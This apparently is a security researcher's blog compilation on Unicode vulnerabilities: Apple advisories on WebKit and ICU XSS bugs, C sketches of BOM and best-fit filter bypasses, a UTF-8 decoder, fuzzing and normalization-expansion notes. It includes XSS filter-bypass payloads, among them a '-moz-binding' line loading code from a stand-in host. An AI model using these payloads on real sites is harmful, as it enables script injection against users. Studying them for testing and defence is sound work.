Advisory: WebKit – Visiting a maliciously crafted website may lead to a cross-site scripting attack

More from: http://support.apple.com/kb/HT3613

CVE-ID: CVE-2006-2783

Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.7, Mac OS X Server v10.5.7, Windows XP or Vista

Impact: Visiting a maliciously crafted website may lead to a cross-site scripting attack

Description: WebKit ignores Unicode byte order mark sequences when parsing web pages. Certain websites and web content filters attempt to sanitize input by blocking specific HTML tags. This approach to filtering may be bypassed and lead to cross-site scripting when encountering maliciously-crafted HTML tags containing byte order mark sequences. This update addresses the issue through improved handling of byte order mark sequences. Credit to Chris Weber of Casaba Security, LLC for reporting this issue.
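
To make the bypass concrete, here is a minimal sketch in C. Both functions are hypothetical stand-ins I made up for illustration: `filter_blocks` plays the tag blacklist, and `strip_bom_sequences` models a parser that silently drops U+FEFF (UTF-8 bytes EF BB BF) wherever it appears. Neither is WebKit's actual code.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Hypothetical blacklist filter: flags input that contains the literal
   bytes "<script". */
int filter_blocks(const char *html) {
    assert(html != NULL);
    return strstr(html, "<script") != NULL;
}

/* Models a parser that ignores byte order marks anywhere in the input by
   dropping every EF BB BF sequence. out must hold strlen(in) + 1 bytes. */
void strip_bom_sequences(const char *in, char *out) {
    assert(in != NULL && out != NULL);
    while (*in) {
        if ((unsigned char)in[0] == 0xEF &&
            (unsigned char)in[1] == 0xBB &&
            (unsigned char)in[2] == 0xBF) {
            in += 3;            /* skip the BOM bytes */
        } else {
            *out++ = *in++;     /* copy everything else unchanged */
        }
    }
    *out = '\0';
}
```

Feed the filter `"<scr\xEF\xBB\xBFipt>alert(1)</script>"` and it finds nothing to block, but after `strip_bom_sequences` the same bytes read `<script>alert(1)</script>`.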

Advisory: International Components for Unicode – Maliciously crafted content may bypass website filters and result in cross-site scripting

Update from: http://support.apple.com/kb/HT3613

CVE-ID: CVE-2009-0153

Available for: Windows XP or Vista

Impact: Maliciously crafted content may bypass website filters and result in cross-site scripting

Description: An implementation issue exists in ICU’s handling of certain character encodings. Using ICU to convert invalid byte sequences to Unicode may result in over-consumption, where trailing bytes are considered part of the original character. This may be leveraged by an attacker to bypass filters on websites that attempt to mitigate cross-site scripting. This update addresses the issue through improved handling of invalid byte sequences. For Mac OS X v10.5 systems, this issue is addressed in Mac OS X v10.5.7. Credit to Chris Weber of Casaba Security for reporting this issue.
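
Over-consumption is easier to see in code. The sketch below is my own toy decoder, not ICU's implementation: `decode_view` is a hypothetical helper that renders ASCII as-is and every multi-byte sequence as `?`. With `strict` set to 0 it trusts the lead byte and swallows the following bytes without checking that they are continuation bytes (10xxxxxx); with `strict` set to 1 it stops at the first byte that is not a continuation byte.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Sequence length announced by a UTF-8 lead byte, or 1 for anything else. */
size_t utf8_seq_len(uint8_t lead) {
    if ((lead & 0xE0) == 0xC0) return 2;
    if ((lead & 0xF0) == 0xE0) return 3;
    if ((lead & 0xF8) == 0xF0) return 4;
    return 1;
}

/* Writes one output char per decoded character: ASCII bytes as-is, anything
   else as '?'. out must hold len + 1 bytes. Returns the character count. */
size_t decode_view(const uint8_t *in, size_t len, int strict, char *out) {
    size_t i = 0, n = 0;
    assert(in != NULL && out != NULL);
    while (i < len) {
        size_t need = utf8_seq_len(in[i]);
        size_t k = 1;
        if (need == 1) {
            out[n++] = in[i] < 0x80 ? (char)in[i] : '?';
            i += 1;
            continue;
        }
        /* Lax mode consumes trailing bytes blindly; strict mode only
           consumes bytes that really are continuation bytes. */
        while (k < need && i + k < len &&
               (!strict || (in[i + k] & 0xC0) == 0x80)) {
            k++;
        }
        out[n++] = '?';
        i += k;
    }
    out[n] = '\0';
    return n;
}
```

For the bytes C2 22 3E (a dangling lead byte followed by `">`), the lax mode yields `?>` and the quote is gone, while the strict mode yields `?">`. A filter that saw the quote in the raw bytes and a consumer that decodes laxly now disagree about where the attribute ends.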

Major applications fail to include full Unicode support

As I’ve found with most of the major Web-apps out there, including social media giants like Facebook and others, Unicode support is far from complete. I’m not a big MySQL guy, but have been building some stuff lately and ran into this:

http://dev.mysql.com/doc/refman/6.0/en/faqs-cjk.html#qandaitem-22-11-1-16

Basically, MySQL versions before 6.0.4 don’t support characters outside the BMP (Basic Multilingual Plane), which seems to be a common pattern for a lot of software. The BMP is all code points 0x0000 to 0xFFFF; however, Unicode stretches far beyond that, to 0x10FFFF. It makes sense I suppose: after all, the BMP is made up of the most commonly used scripts, and the stuff beyond it (the supplementary planes) is usually considered rare.

Advisory: International Components for Unicode CVE-2009-0153

Big ones from Apple today: http://support.apple.com/kb/HT3549

CVE-ID: CVE-2009-0153

Available for: Mac OS X v10.5 through v10.5.6, Mac OS X Server v10.5 through v10.5.6

Impact: Maliciously crafted content may bypass website filters and result in cross-site scripting

Description: An implementation issue exists in ICU’s handling of certain character encodings. Using ICU to convert invalid byte sequences to Unicode may result in over-consumption, where trailing bytes are considered part of the original character. This may be leveraged by an attacker to bypass filters on websites that attempt to mitigate cross-site scripting. This update addresses the issue through improved handling of invalid byte sequences. This issue does not affect systems prior to Mac OS X v10.5. Credit to Chris Weber of Casaba Security for reporting this issue.

Unicode security attacks and test cases – Best-fit mappings and String transformations

Best-fit mappings are another complex topic in Unicode, easily overlooked or misunderstood. On the defensive side, if you can only remember two things, make them these:

  1. Converting to Unicode is safe.
  2. Converting between legacy character sets is dangerous.

Ah, forget it. Unfortunately it’s more complicated than that, because basic string handling can also trigger best-fit behavior even when you aren’t intentionally converting between encodings or charsets.

The term best-fit mapping describes the concept of how a character should be represented when it doesn’t have an explicit place in a destination character set.  

I’ve actually pulled off some interesting cross-site scripting attacks by exploiting best-fit mappings. In 2008 I was testing a popular social networking app. They had just implemented a new profile editor complete with user-controlled CSS. They were smart though, they actually knew that stuff like this would lead to XSS:

-moz-binding: url(http://nottrusted.com/gotcha.xml#xss)

So they implemented some sort of blacklist because, well, that’s common. Anyway, somewhere in the call stack of their parsing and filtering, the string I passed in was being transformed. To get to the point, I eventually figured out I could manipulate the input with a character that would pass through their filter and come out transformed into the character I needed. The input:

−moz−binding: url(http://nottrusted.com/gotcha.xml#xss)

The first character here is U+2212, the MINUS SIGN (−), which was being transformed through an apparent best-fit mapping into U+002D, the HYPHEN-MINUS (-).
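
The order of operations is the whole bug, so here is a small sketch of it. Everything in it is hypothetical: `blacklist_hits` stands in for their filter, `to_legacy` for whatever conversion was happening further down the stack, and the `BEST_FIT` table holds a few illustrative entries rather than a real code page mapping.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

struct best_fit { uint32_t from; char to; };

/* Illustrative entries only, not a real code page table. */
const struct best_fit BEST_FIT[] = {
    { 0x2212, '-' },  /* MINUS SIGN -> HYPHEN-MINUS, the case above */
    { 0xFF1C, '<' },  /* FULLWIDTH LESS-THAN SIGN */
    { 0xFF1E, '>' },  /* FULLWIDTH GREATER-THAN SIGN */
};

/* Hypothetical filter run on the raw code points: does the input start
   with the ASCII string "-moz-binding"? */
int blacklist_hits(const uint32_t *cps, size_t n) {
    static const char needle[] = "-moz-binding";
    size_t m = sizeof needle - 1, i;
    assert(cps != NULL);
    if (n < m) return 0;
    for (i = 0; i < m; i++) {
        if (cps[i] != (uint32_t)(unsigned char)needle[i]) return 0;
    }
    return 1;
}

/* Lossy conversion to a single-byte string: ASCII passes through, table
   hits are substituted, everything else becomes '?'. out holds n + 1 bytes. */
void to_legacy(const uint32_t *cps, size_t n, char *out) {
    size_t i, j;
    assert(cps != NULL && out != NULL);
    for (i = 0; i < n; i++) {
        char c = '?';
        if (cps[i] < 0x80) {
            c = (char)cps[i];
        } else {
            for (j = 0; j < sizeof BEST_FIT / sizeof BEST_FIT[0]; j++) {
                if (BEST_FIT[j].from == cps[i]) { c = BEST_FIT[j].to; break; }
            }
        }
        out[i] = c;
    }
    out[n] = '\0';
}
```

Pass in U+2212 `moz` U+2212 `binding` and `blacklist_hits` returns 0, yet `to_legacy` hands back the ASCII string `-moz-binding`. Filtering after the transformation, instead of before it, would have caught it.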

The Watcher security testing tool I released a few months ago has a new check coming to detect string transformations like this. My plan was to detect spots where strings can be manipulated to pull off attacks like I just described. Does anyone want to test this, and are there any other good stories about manipulating best-fit mappings to pull off attacks?

Ultrafast UTF-8 decoder by Bjoern Hoehrmann

I believe this is still getting tested by several parties, but it’s obviously a highly optimized implementation of a UTF-8 decoder. Bjoern Hoehrmann released his Flexible and Economical UTF-8 Decoder recently. Check it out:


// Copyright (c) 2008-2009 Bjoern Hoehrmann
// See http://bjoern.hoehrmann.de/utf-8/decoder/dfa/ for details.

#include <stdint.h>

#define UTF8_ACCEPT 0
#define UTF8_REJECT 1

static const uint8_t utf8d[] = {
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, // 00..1f
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, // 20..3f
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, // 40..5f
0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, // 60..7f
1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9,9, // 80..9f
7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7,7, // a0..bf
8,8,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2,2, // c0..df
0xa,0x3,0x3,0x3,0x3,0x3,0x3,0x3,0x3,0x3,0x3,0x3,0x3,0x4,0x3,0x3, // e0..ef
0xb,0x6,0x6,0x6,0x5,0x8,0x8,0x8,0x8,0x8,0x8,0x8,0x8,0x8,0x8,0x8, // f0..ff
0x0,0x1,0x2,0x3,0x5,0x8,0x7,0x1,0x1,0x1,0x4,0x6,0x1,0x1,0x1,0x1, // s0..s0
1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,1,1,1,1,1,0,1,0,1,1,1,1,1,1, // s1..s2
1,2,1,1,1,1,1,2,1,2,1,1,1,1,1,1,1,1,1,1,1,1,1,2,1,1,1,1,1,1,1,1, // s3..s4
1,2,1,1,1,1,1,1,1,2,1,1,1,1,1,1,1,1,1,1,1,1,1,3,1,3,1,1,1,1,1,1, // s5..s6
1,3,1,1,1,1,1,3,1,3,1,1,1,1,1,1,1,3,1,1,1,1,1,1,1,1,1,1,1,1,1,1, // s7..s8
};

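static inline uint32_t
decode(uint32_t* state, uint32_t* codep, uint32_t byte) {
  // Look up the character class of this byte (first 256 table entries).
  uint32_t type = utf8d[byte];

  // Mid-sequence: shift in six payload bits. At the start of a sequence:
  // mask off the lead byte's length prefix.
  *codep = (*state != UTF8_ACCEPT) ?
    (byte & 0x3fu) | (*codep << 6) :
    (0xff >> type) & (byte);

  // Advance the DFA; the transition table starts at offset 256.
  *state = utf8d[256 + *state*16 + type];
  return *state;
}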

Unicode security attacks and test cases – fuzzing with Unicode

When it comes to fuzzing parsers, protocols, and other software, I want the fuzzer to be capable of producing tests specific to Unicode. Here’s what it should do at a minimum:

  • Generate half a surrogate pair in UTF-8 or UTF-16
  • Generate ill-formed byte sequences for UTF-8 and UTF-16
  • Generate overlong UTF-8
  • Generate unassigned and reserved code points
  • Generate code points outside of the valid range
  • Generate interesting control characters and characters with special meaning like the BOM, embedding, overrides, etc.

I’ve got some code that does most of these things. Maybe I should elaborate on them some more… Does Peach or another fuzzing framework provide this already?
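
As a starting point, several of the cases in the list fall out of one deliberately unvalidated encoder. This is a minimal sketch with a made-up name (`utf8_encode_forced`), not taken from any fuzzing framework: it writes a code point using exactly the number of bytes you ask for and performs none of the checks a conforming encoder would.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Encodes cp in exactly nbytes (2..4) UTF-8 bytes with no validity checks:
   no shortest-form rule, no surrogate check, no U+10FFFF limit.
   Returns the number of bytes written, or 0 if cp does not fit in the
   payload bits of that length. out must hold at least nbytes bytes. */
size_t utf8_encode_forced(uint32_t cp, size_t nbytes, uint8_t *out) {
    assert(out != NULL);
    switch (nbytes) {
    case 2:
        if (cp > 0x7FF) return 0;
        out[0] = (uint8_t)(0xC0 | (cp >> 6));
        out[1] = (uint8_t)(0x80 | (cp & 0x3F));
        return 2;
    case 3:
        if (cp > 0xFFFF) return 0;
        out[0] = (uint8_t)(0xE0 | (cp >> 12));
        out[1] = (uint8_t)(0x80 | ((cp >> 6) & 0x3F));
        out[2] = (uint8_t)(0x80 | (cp & 0x3F));
        return 3;
    case 4:
        if (cp > 0x1FFFFF) return 0;
        out[0] = (uint8_t)(0xF0 | (cp >> 18));
        out[1] = (uint8_t)(0x80 | ((cp >> 12) & 0x3F));
        out[2] = (uint8_t)(0x80 | ((cp >> 6) & 0x3F));
        out[3] = (uint8_t)(0x80 | (cp & 0x3F));
        return 4;
    default:
        return 0;
    }
}
```

Asking for `/` (U+002F) in two bytes gives the overlong form C0 AF, U+D800 in three bytes gives the lone surrogate ED A0 80, and 0x110000 in four bytes gives the out-of-range sequence F4 90 80 80.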

Unicode security attacks and test cases – Normalization expansion for buffer overflows

Normalization, like casing operations, can cause changes to the number of characters and bytes in a string. In testing software, I want to know how to get the most bang for my buck – in other words, what’s the minimal input I can provide to cause the maximum character and byte expansion?

First step: Figure out what normalization operation your input is going through – NFC, NFD, NFKC, or NFKD.

Next step: Find the right input.

For example, if I pass in a character like U+2177 SMALL ROMAN NUMERAL EIGHT (ⅷ), I’ve passed in a single ‘character’ that takes three bytes [E2, 85, B7] to encode in UTF-8. If that character passes through a compatibility normalization form like NFKC or NFKD, then it has a compatibility mapping from one code point to four: U+0076 U+0069 U+0069 U+0069. Now those are all ASCII characters, so bytewise I didn’t really expand all that much, just one extra byte (three bytes become four), but I gained three extra characters.

Well there may be better cases than this one, just take a look at the maximum expansion factor table, courtesy of the Unicode Normalization FAQ:

Form        UTF     Factor  Sample
NFC         8       3X      𝅘𝅥𝅮 U+1D160
            16,32   3X      U+FB2C
NFD         8       3X      ΐ U+0390
            16,32   4X      U+1F82
NFKC/NFKD   8       11X     U+FDFA
            16,32   18X     U+FDFA
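
The arithmetic behind the U+2177 example and the U+FDFA row can be checked with a few lines of C. This sketch does no normalization itself: the decompositions are hard-coded (the first from the text above, the second from the character's compatibility mapping as I understand it), and the helper names are my own.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Bytes needed to encode one code point in UTF-8 (no validation). */
size_t utf8_len(uint32_t cp) {
    if (cp < 0x80) return 1;
    if (cp < 0x800) return 2;
    if (cp < 0x10000) return 3;
    return 4;
}

/* Total UTF-8 byte length of a code point sequence. */
size_t utf8_total(const uint32_t *cps, size_t n) {
    size_t i, total = 0;
    assert(cps != NULL);
    for (i = 0; i < n; i++) total += utf8_len(cps[i]);
    return total;
}

/* Hard-coded NFKD results (assumption: no normalization library here). */
const uint32_t U2177_NFKD[] = { 0x0076, 0x0069, 0x0069, 0x0069 };
const uint32_t UFDFA_NFKD[] = {
    0x0635, 0x0644, 0x0649, 0x0020, 0x0627, 0x0644,
    0x0644, 0x0647, 0x0020, 0x0639, 0x0644, 0x064A,
    0x0647, 0x0020, 0x0648, 0x0633, 0x0644, 0x0645,
};
```

U+2177 goes from 3 bytes to 4. U+FDFA goes from 3 bytes to 33, which is the 11X in the table, and from 1 code point to 18, which is the 18X.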
Advisory: Lenovo/IBM ActiveX buffer overflow

CERT released the advisory for this vulnerability, which I believe Lenovo/IBM is not fixing.

http://www.kb.cert.org/vuls/id/340420

This ActiveX control comes preinstalled on many Lenovo systems, and is also downloaded from the main page of their support site. It’s a nasty stack-based buffer overflow, and enterprises and other consumers should consider how to work around this.

Exploiting Unicode-enabled Software slides from CanSecWest and SOURCE

I’m putting my slides online from recent talks at CanSecWest and SOURCE Boston. I have some plans to get a micro-attack-database of useful Unicode characters online soon. The idea is to compress the massive Unicode database into just the characters we’re interested in as testers – ones that can manipulate casing operations, normalization routines, best-fits and other categories to produce useful inputs for fuzzing, web-testing, and visual effects.

